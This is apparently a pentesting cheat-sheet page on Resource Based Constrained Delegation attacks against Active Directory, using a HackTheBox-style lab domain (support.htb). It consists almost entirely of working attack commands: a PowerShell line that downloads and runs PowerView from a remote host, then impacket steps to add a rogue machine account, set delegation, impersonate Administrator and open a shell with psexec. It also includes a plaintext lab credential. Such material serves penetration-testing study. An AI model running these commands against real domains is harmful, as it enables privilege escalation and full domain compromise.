Resource Based Constrained Delegation

Linux based Attack Commands
Enumeration

Exploitation





Last updated







Last updated
# Check if MS-ds-machineaccountquota has more than 0
# If the output of the command below shows that this attribute is set to 10, this means each authenticated domain user can add up to 10 computers to the domain.
PS> Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota
# Verify that the msds-allowedtoactonbehalfofotheridentity attribute is empty.
PS> iex (new-Object Net.WebClient).DownloadString('http://10.10.14.36/privesc/PowerView.ps1')|Import-Module PowerView.ps1
PS> Get-DomainComputer DC | select name, msds-allowedtoactonbehalfofotheridentity
# The following output shows that the value is empty. Now it is ready to attack. # Kali
addcomputer.py -computer-name 'EVILCOM$' -computer-pass password -dc-ip $RHOST support/support:Ironside47pleasure40Watchful# Use the rbcd.py downloaded above
./rbcd.py -f EVILCOM -t DC -dc-ip $RHOST support\\support:Ironside47pleasure40Watchful# Kali
impacket-getST -spn cifs/DC.support.htb -impersonate Administrator -dc-ip $RHOST support/EVILCOM$:password# Kali
export KRB5CCNAME=./Administrator.ccache
Klist# Kali
impacket-psexec -k DC.support.htb